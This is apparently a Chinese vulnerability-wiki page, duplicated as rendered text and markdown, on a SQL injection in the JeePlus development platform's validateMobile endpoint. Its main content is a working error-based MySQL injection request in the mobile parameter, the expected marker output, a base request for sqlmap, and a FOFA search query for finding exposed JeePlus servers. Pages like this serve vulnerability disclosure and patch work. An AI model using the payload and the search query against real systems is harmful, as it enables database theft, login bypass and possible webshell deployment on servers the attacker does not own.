fofamini-wiki

登录白背景

源码

JeePlus快速开发平台 validateMobile SQL注入

一、漏洞简介

JeePlus快速开发平台 validateMobile SQL注入，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

二、影响版本

JeePlus快速开发平台

三、资产测绘

fofaapp="JeePlus"
特征

四、漏洞复现

GET /a/sys/user/validateMobile?&mobile=1%27+AND+GTID_SUBSET%28CONCAT%280x71626b7171%2C%28SELECT+%28ELT%285680%3D5680%2C1%29%29%29%2C0x7176767671%29%2C5680%29--+ywwp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

qbkqq1qvvvq

sqlmap

GET /a/sys/user/validateMobile?&mobile=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/gluyn6ucnl0xgl0y

# JeePlus快速开发平台 validateMobile SQL注入

# 一、漏洞简介
JeePlus快速开发平台 validateMobile SQL注入，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

# 二、影响版本

- JeePlus快速开发平台

# 三、资产测绘

- fofa`app="JeePlus"`
- 特征

![image.png](./img/3kQ1c84ysxIpoGl8/1708962549321-f1636518-6f0a-4ee8-af65-ed3eb5ec07d3-501087.png)

# 四、漏洞复现
```
GET /a/sys/user/validateMobile?&mobile=1%27+AND+GTID_SUBSET%28CONCAT%280x71626b7171%2C%28SELECT+%28ELT%285680%3D5680%2C1%29%29%29%2C0x7176767671%29%2C5680%29--+ywwp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```
![image.png](./img/3kQ1c84ysxIpoGl8/1708962586258-9310d25b-2c48-435f-a897-84df621f95ca-577626.png)
![image.png](./img/3kQ1c84ysxIpoGl8/1708962606830-6f01e4ff-b42b-4766-9062-576d3344e5c3-181032.png)
```
qbkqq1qvvvq
```
sqlmap
```
GET /a/sys/user/validateMobile?&mobile=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```
![image.png](./img/3kQ1c84ysxIpoGl8/1708962639838-1b6610a1-0d30-46ad-b66e-e6b0ae221e24-096611.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gluyn6ucnl0xgl0y>